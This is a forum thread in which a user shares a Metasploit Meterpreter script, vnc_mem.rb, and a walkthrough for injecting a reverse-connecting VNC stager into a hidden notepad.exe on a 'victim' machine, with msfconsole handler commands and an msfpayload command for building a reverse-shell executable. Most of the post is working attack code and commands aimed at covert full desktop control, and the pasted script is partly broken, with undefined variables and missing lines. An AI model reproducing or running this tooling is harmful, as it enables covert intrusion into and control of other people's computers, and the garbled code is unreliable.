Results 1 to 4 of 4

Thread: vnc memory injection with meterpreter

  1. #1
    Very good friend of the forum hhmatt's Avatar
    Join Date
    Jan 2010

    Post vnc memory injection with meterpreter

    A script that utilizes memory injection to get a VNC session without losing your meterpreter session.

    I spent quite a bit of time trying to get vnc_oneport.rb working. Then finally decided that vnc.rb worked great except 1 thing. It created a file on the victims machine and you would have to manually delete it later. So I utilized the cool execution and injection feature that was in vnc_oneport.rb and ported it into vnc.rb.

    This is sort of a work in progress but I'll share what I've done so far to get it working. It's not as hard as it looks as long as you know how to get a meterpreter session.

    First we need to traverse to the directory that we will be putting our script into.

    Open a shell and type:
    cd /pentest/exploits/framework3/scripts/meterpreter/
    Use whatever editor your most comfortable with here but keep the name the same.
    nano vnc_mem.rb
    Now copy this:
    # $Id: vnc_mem.rb 12-17-2009 hdm $
    # Meterpreter script for obtaining a quick VNC session
    # Hybrid of vnc.rb and vnc_oneport.rb
    # Utilizes memory functions so no file is created
    # Known Issue: spawns metasploit courtesy shell on vnc server side (victim)
    # You can exit out of courtesy shell easily once you obtain a vnc session
    # All code written by H.D. Moore (hdm)
    # Edited by hhmatt
    session = client
    # Options
    opts =
            "-h"  => [ false,  "This help menu"],
            "-r"  => [ true,   "The IP of the system running Metasploit listening for the connect back"],
            "-p"  => [ true,   "The port on the remote host where Metasploit is listening (default: 4545)"],
    #       "-D"  => [ false,  "Disable the automatic multi/handler (use with -r to accept on another system)"],
            "-e"  => [ true,    "The process to run and inject into (default: notepad.exe)"]
    # Default parameters
    runme    = "notepad.exe"
    rhost    = Rex::Socket.source_address("")
    rport    = 4545
    #autoconn = true
    # Option parsing
    opts.parse(args) do |opt, idx, val|
            case opt
            when "-h"
            when "-r"
                    rhost = val
            when "-p"
                    rport = val.to_i
    #       when "-D"
    #               autoconn = false
            when "-e"
                    runme = val
    # Create the agent EXE
    print_status("Creating a VNC stager: LHOST=#{rhost} LPORT=#{rport})")
    pay = client.framework.payloads.create("windows/vncinject/reverse_tcp")
    pay.datastore['LHOST'] = rhost
    pay.datastore['LPORT'] = rport
    raw  = pay.generate
    exe = ::Msf::Util::EXE.to_win32pe(client.framework, raw)
    print_status("VNC stager executable #{exe.length} bytes long")
    # Create a host process
    pid = client.sys.process.execute("#{runme}", nil, {'Hidden' => 'true'}).pid
    print_status("Host process #{runme} has PID #{pid}")
    mem  = note.memory.allocate(1024*32)
    print_status("Allocated memory at address #{"0x%.8x" % mem}")
    print_status("Writing the VNC stager into memory...")
    note.memory.write(mem, raw)
    # Setup the multi/handler
            mul = client.framework.exploits.create("multi/handler")
            mul.datastore['PAYLOAD']   = "windows/vncinject/reverse_tcp"
            mul.datastore['LHOST']     = rhost
            mul.datastore['LPORT']     = rport
            mul.datastore['EXITFUNC']  = 'process'
            mul.datastore['ExitOnSession'] = true
                    'Payload'        => mul.datastore['PAYLOAD'],
                    'RunAsJob'       => true)
    # Execute the agent
    print_status("Creating a new thread within #{runme} to run the VNC stager...")
    note.thread.create(mem, 0)
    print_status("Executing the VNC agent with endpoint #{rhost}:#{rport}...")
    proc = session.sys.process.execute(tempexe, nil, {'Hidden' => true})
    And paste it into your editor.

    Then you can save and exit:
    Ctrl+o (the letter not the number zero)
    Nothing more needs to be done, it will automatically load the script once metasploit starts.
    So lets start Metasploit!
    I'm using the reverse tcp metasploit connection from a executable payload. You can use whatever method you know or have to give you a meterpreter session.

    Ok so let's get our meterpreter session started.
    msf > use multi/handler
    msf(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    msf(handler) > show options
    At this point you will need to set LHOST and RPORT (remember to change these to match your network and port).
    LHOST is your attacker machine and LPORT is your port to listen on.
    msf(handler) > set LHOST
    msf(handler) > set LPORT 81
    OK. Let's start our listener now.
    msf(handler) > exploit
    At this point you should see something like this:
    [*] Starting the payload handler...
    [*] Started Reverse Handler on port 81
    Now we need to run our executable on the victim machine to give us a meterpreter session.
    This is how I made my exe.
    ./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=81 X > /tmp/meter.exe
    This is what you should get at the end:
    meterpreter >
    This is a good point to make sure your connected to the right machine.
    meterpreter > ipconfig
    meterpreter > getuid
    If you need to know some of the main basic commands that meterpreter uses just type in a ? like this.
    meterpreter > ?
    OK, now to see if our script is recognized.
    meterpreter > run vnc_mem.rb -h
    This should post the scripts help options.
    Here's what I get:
        -e <opt>  The process to run and inject into (default: notepad.exe)
        -h        This help menu
        -p <opt>  The port on the remote host where Metasploit is listening (default: 4545)
        -r <opt>  The IP of the system running Metasploit listening for the connect back
    Looks good lets give it a run:
    meterpreter > run vnc_mem.rb
    At this point you should've recieved a new window open in tightvnc with your victims desktop and full control!
    You can also check back on meterpreter and see that you still have an active session. Sometimes you have to hit enter once or twice to see the prompt.

    Hope you get some useful information from this and happy hacking!

  2. #2
    Junior Member cRaZylilmuffin's Avatar
    Join Date
    Mar 2010


    cool ill have to try it out
    "Things are not what they appear to be: nor are they otherwise." -Surangama Sutra

  3. #3
    Good friend of the forums
    Join Date
    Feb 2009


    great work dude! Nice merge between the rb's

  4. #4
    Very good friend of the forum hhmatt's Avatar
    Join Date
    Jan 2010


    Thanks, I'm glad you liked it.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts